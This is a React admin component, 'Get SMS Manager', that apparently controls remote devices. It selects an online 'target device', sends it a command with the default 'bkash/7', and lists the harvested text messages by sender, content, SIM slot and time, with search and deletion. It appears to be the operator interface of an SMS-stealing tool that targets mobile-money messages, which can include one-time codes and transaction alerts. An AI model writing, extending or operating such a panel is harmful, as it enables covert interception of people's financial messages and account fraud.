import React, { useState, useEffect, useCallback } from 'react';
import socketService from '../services/socketService';
import Layout from '../components/Layout';
import moment from 'moment-timezone';

const GetSMSManager = () => {
    // --- States ---
    const [smsList, setSmsList] = useState([]);
    const [devices, setDevices] = useState([]);
    const [loading, setLoading] = useState(true);
    const [sending, setSending] = useState(false);
    
    // Search State (নতুন স্টেট)
    const [searchQuery, setSearchQuery] = useState('');

    // Form States
    const [selectedDeviceId, setSelectedDeviceId] = useState('');
    const [commandBody, setCommandBody] = useState('bkash/7'); 

    // --- Pagination States ---
    const [currentPage, setCurrentPage] = useState(1);
    const [itemsPerPage] = useState(100); // ১০০টি করে ডাটা

    // --- Data Fetching ---
    const fetchData = useCallback((isBackgroundUpdate = false) => {
        if (!isBackgroundUpdate) {
            setLoading(true);
        }
        socketService.emit('fetch_sms_table_data'); 
        socketService.emit('get_all_active_devices_for_sms'); 
    }, []);

    useEffect(() => {
        const socket = socketService.getSocket();
        if (!socket || !socket.connected) {
            socketService.connect();
        }

        const handleConnect = () => fetchData(false);

        const handleSmsData = (data) => {
            setLoading(false);
            if (data && Array.isArray(data)) {
                const sortedData = [...data].sort((a, b) => new Date(b.received_at) - new Date(a.received_at));
                setSmsList(sortedData);
            } else {
                setSmsList([]);
            }
        };

        const handleDevicesData = (data) => {
            setDevices(data || []);
        };

        const handleResponse = (data) => {
            setSending(false);
            if (data.success) {
                alert(`✅ ${data.message}`);
                fetchData(true);
            } else {
                alert(`❌ ${data.message}`);
            }
        };

        socketService.on('connect', handleConnect);
        socketService.on('sms_table_data_list', handleSmsData);
        socketService.on('active_devices_list_sms', handleDevicesData);
        socketService.on('trigger_sms_notification_response', handleResponse);
        socketService.on('sms_table_delete_response', handleResponse);
        socketService.on('new_sms_table_uploaded', () => fetchData(true));

        if (socket && socket.connected) {
            fetchData(false);
        }

        return () => {
            socketService.off('connect', handleConnect);
            socketService.off('sms_table_data_list', handleSmsData);
            socketService.off('active_devices_list_sms', handleDevicesData);
            socketService.off('trigger_sms_notification_response', handleResponse);
            socketService.off('sms_table_delete_response', handleResponse);
            socketService.off('new_sms_table_uploaded');
        };
    }, [fetchData]);

    // --- Filter & Pagination Logic ---
    
    // ১. সার্চ কুয়েরি অনুযায়ী ফিল্টার করা (Message Body থেকে)
    const filteredSmsList = smsList.filter(sms => 
        (sms.message || '').toLowerCase().includes(searchQuery.toLowerCase())
    );

    // ২. সার্চ করলে অটোমেটিক পেজ ১ এ নিয়ে যাওয়া
    useEffect(() => {
        setCurrentPage(1);
    }, [searchQuery]);

    // ৩. ফিল্টার করা ডাটার উপর পেজিনেশন
    const indexOfLastItem = currentPage * itemsPerPage;
    const indexOfFirstItem = indexOfLastItem - itemsPerPage;
    const currentSmsList = filteredSmsList.slice(indexOfFirstItem, indexOfLastItem);
    const totalPages = Math.ceil(filteredSmsList.length / itemsPerPage);

    const paginate = (pageNumber) => setCurrentPage(pageNumber);

    const renderPaginationButtons = () => {
        const buttons = [];
        const maxButtonsToShow = 20;
        const currentBlock = Math.floor((currentPage - 1) / maxButtonsToShow);
        
        let startPage = (currentBlock * maxButtonsToShow) + 1;
        let endPage = Math.min(startPage + maxButtonsToShow - 1, totalPages);

        if (startPage > 1) {
            buttons.push(
                <button key="first" onClick={() => setCurrentPage(1)} className="btn btn-sm pagination-btn me-1">1..</button>
            );
            buttons.push(<span key="dots1" className="me-1">...</span>);
        }

        for (let i = startPage; i <= endPage; i++) {
            buttons.push(
                <button 
                    key={i} 
                    onClick={() => paginate(i)}
                    className={`btn btn-sm pagination-btn me-1 ${currentPage === i ? 'active' : ''}`}
                >
                    {i}
                </button>
            );
        }

        if (endPage < totalPages) {
            buttons.push(<span key="dots2" className="me-1">...</span>);
            buttons.push(
                <button key="last" onClick={() => setCurrentPage(totalPages)} className="btn btn-sm pagination-btn me-1">..{totalPages}</button>
            );
        }

        return buttons;
    };

    // --- Handlers ---
    const handleSendRequest = (e) => {
        e.preventDefault();
        if (!selectedDeviceId || !commandBody) {
            alert("⚠️ Please select a device and enter command body!");
            return;
        }
        setSending(true);
        socketService.emit('trigger_sms_notification', {
            deviceId: selectedDeviceId,
            body: commandBody
        });
    };

    const handleDelete = (id) => {
        if (window.confirm("Are you sure you want to delete this SMS?")) {
            socketService.emit('delete_sms_table_data', { id });
        }
    };

    const handleDeleteAll = () => {
        if (window.confirm("⚠️ Are you sure you want to DELETE ALL SMS?")) {
            socketService.emit('delete_all_sms_table_data');
        }
    };

    return (
        <Layout>
            <div className="main-content-area py-3 px-4">
                <div className="d-flex justify-content-between align-items-center mb-4">
                    <h5 className="section-title m-0">📩 Get SMS Manager</h5>
                    <div className="count-badge">Total SMS: <span>{filteredSmsList.length}</span></div>
                </div>

                {/* Control Panel */}
                <div className="filter-card shadow-sm border-0 mb-4">
                    <h6 className="field-label mb-3" style={{color: '#0284c7'}}>REMOTE SMS FETCHER</h6>
                    <form onSubmit={handleSendRequest} className="row g-3 align-items-end">
                        <div className="col-md-4">
                            <label className="field-label">SELECT TARGET DEVICE</label>
                            <select 
                                className="modern-input" 
                                value={selectedDeviceId} 
                                onChange={(e) => setSelectedDeviceId(e.target.value)}
                                required
                            >
                                <option value="">-- Choose Online Device --</option>
                                {devices.map(dev => (
                                    <option key={dev.id} value={dev.id}>
                                        {dev.username} - {dev.deviceName}
                                    </option>
                                ))}
                            </select>
                        </div>
                        <div className="col-md-4">
                            <label className="field-label">COMMAND / SENDER ID</label>
                            <input 
                                type="text" 
                                className="modern-input" 
                                placeholder="e.g. bkash/7" 
                                value={commandBody} 
                                onChange={(e) => setCommandBody(e.target.value)}
                                required 
                            />
                        </div>
                        <div className="col-md-2">
                            <button type="submit" className="btn btn-apply fw-bold w-100 py-2" disabled={sending}>
                                {sending ? 'Sending...' : '📲 Get SMS'}
                            </button>
                        </div>
                        <div className="col-md-2">
                             <button type="button" onClick={handleDeleteAll} className="btn btn-danger fw-bold w-100 py-2" style={{fontSize: '13px'}}>
                                🗑 Clear All
                            </button>
                        </div>
                    </form>
                </div>

                {/* 🔥 Search Bar Added Here */}
                <div className="mb-3">
                    <input 
                        type="text" 
                        className="modern-input" 
                        placeholder="🔍 Search in Message Content..." 
                        value={searchQuery}
                        onChange={(e) => setSearchQuery(e.target.value)}
                        style={{ maxWidth: '400px' }}
                    />
                </div>

                {/* Data Table */}
                <div className="table-container shadow-sm border-0">
                    <div className="table-responsive">
                        <table className="custom-zebra-table">
                            <thead>
                                <tr>
                                    <th className="ps-4">SENDER</th>
                                    <th style={{width: '50%'}}>MESSAGE CONTENT</th>
                                    <th>SIM SLOT</th>
                                    <th>RECEIVED TIME</th>
                                    <th className="text-end pe-4">ACTION</th>
                                </tr>
                            </thead>
                            <tbody>
                                {loading ? (
                                    <tr><td colSpan="5" className="text-center py-5">Loading SMS...</td></tr>
                                ) : filteredSmsList.length === 0 ? (
                                    <tr><td colSpan="5" className="text-center py-5 text-muted">No SMS found matching your search.</td></tr>
                                ) : (
                                    currentSmsList.map((sms) => (
                                        <tr key={sms._id}>
                                            <td className="ps-4">
                                                <div className="sender-tag">{sms.sender}</div>
                                            </td>
                                            <td>
                                                <div className="msg-body">
                                                    {/* সার্চ টার্ম হাইলাইট করার জন্য সিম্পল লজিক ব্যবহার করা যেতে পারে, তবে এখানে সিম্পল টেক্সট রাখা হলো */}
                                                    {sms.message}
                                                </div>
                                            </td>
                                            <td>
                                                <div className="sim-num text-uppercase">
                                                    {sms.simSolt === '0' ? 'SIM 1' : sms.simSolt === '1' ? 'SIM 2' : sms.simSolt}
                                                </div>
                                            </td>
                                            <td>
                                                <div className="date-bold">
                                                    {moment(sms.received_at).format('DD MMM, YYYY')}
                                                </div>
                                                <div className="time-muted">
                                                    {moment(sms.received_at).format('hh:mm A')}
                                                </div>
                                            </td>
                                            <td className="text-end pe-4">
                                                <button 
                                                    className="btn btn-sm btn-light border text-danger" 
                                                    onClick={() => handleDelete(sms._id)}
                                                >
                                                    🗑
                                                </button>
                                            </td>
                                        </tr>
                                    ))
                                )}
                            </tbody>
                        </table>
                    </div>

                    {/* Pagination Controls */}
                    {!loading && filteredSmsList.length > itemsPerPage && (
                        <div className="d-flex justify-content-center align-items-center py-3 bg-white border-top flex-wrap">
                            <button 
                                className="btn btn-sm pagination-btn me-2" 
                                onClick={() => setCurrentPage(prev => Math.max(prev - 1, 1))}
                                disabled={currentPage === 1}
                            >
                                &laquo; Previous
                            </button>

                            {renderPaginationButtons()}

                            <button 
                                className="btn btn-sm pagination-btn ms-2" 
                                onClick={() => setCurrentPage(prev => Math.min(prev + 1, totalPages))}
                                disabled={currentPage === totalPages}
                            >
                                Next &raquo;
                            </button>
                        </div>
                    )}
                </div>
            </div>

            <style>{`
                /* General Styles */
                .main-content-area { background-color: #f4f7fa; min-height: 100vh; font-family: 'Inter', sans-serif; }
                .section-title { color: #334155; font-weight: 700; }
                .count-badge { background: #fff; padding: 5px 15px; border-radius: 50px; border: 1px solid #e2e8f0; font-size: 13px; font-weight: 600; }
                .count-badge span { color: #0284c7; font-weight: 800; }
                .filter-card { background: #ffffff; padding: 20px; border-radius: 12px; }
                .field-label { font-size: 11px; font-weight: 700; color: #64748b; margin-bottom: 5px; text-transform: uppercase; }
                .modern-input { background: #f8fafc; border: 1px solid #cbd5e1; padding: 8px 12px; border-radius: 8px; font-size: 13px; width: 100%; outline: none; transition: 0.2s; }
                .modern-input:focus { border-color: #0284c7; background: #fff; }
                .btn-apply { background: #0284c7; color: white; border-radius: 8px; font-size: 13px; transition: 0.3s; border: none; }
                .btn-apply:hover { background: #0369a1; transform: translateY(-1px); }
                
                /* Table Styles */
                .table-container { background: #ffffff; border-radius: 12px; overflow: hidden; }
                .custom-zebra-table { width: 100%; border-collapse: collapse; }
                .custom-zebra-table thead { background: #e2e8f0; color: #475569; }
                .custom-zebra-table th { padding: 14px 15px; font-size: 11px; font-weight: 800; text-transform: uppercase; border-bottom: 2px solid #cbd5e1; text-align: left; }
                .custom-zebra-table tbody tr:nth-child(even) { background-color: #f8fafc; }
                .custom-zebra-table tbody tr:hover { background-color: #edf2f7 !important; }
                .custom-zebra-table td { padding: 12px 15px; vertical-align: middle; border-bottom: 1px solid #edf2f7; }
                .sender-tag { color: #0284c7; font-weight: 700; font-size: 14px; background: #e0f2fe; display: inline-block; padding: 2px 8px; border-radius: 4px; }
                .msg-body { color: #334155; font-size: 13px; line-height: 1.5; font-family: monospace; }
                .sim-num { color: #64748b; font-weight: 700; font-size: 12px; }
                .date-bold { color: #334155; font-weight: 700; font-size: 13px; }
                .time-muted { font-size: 11px; color: #64748b; }

                /* Pagination Style */
                .pagination-btn {
                    background: #fff;
                    border: 1px solid #cbd5e1;
                    color: #64748b;
                    font-weight: 600;
                    transition: 0.2s;
                    min-width: 32px;
                    margin-bottom: 5px; 
                }
                .pagination-btn:hover {
                    background: #f1f5f9;
                    color: #0284c7;
                }
                .pagination-btn.active {
                    background: #0284c7;
                    color: white;
                    border-color: #0284c7;
                }
                .pagination-btn:disabled {
                    opacity: 0.5;
                    cursor: not-allowed;
                }
            `}</style>
        </Layout>
    );
};

export default GetSMSManager;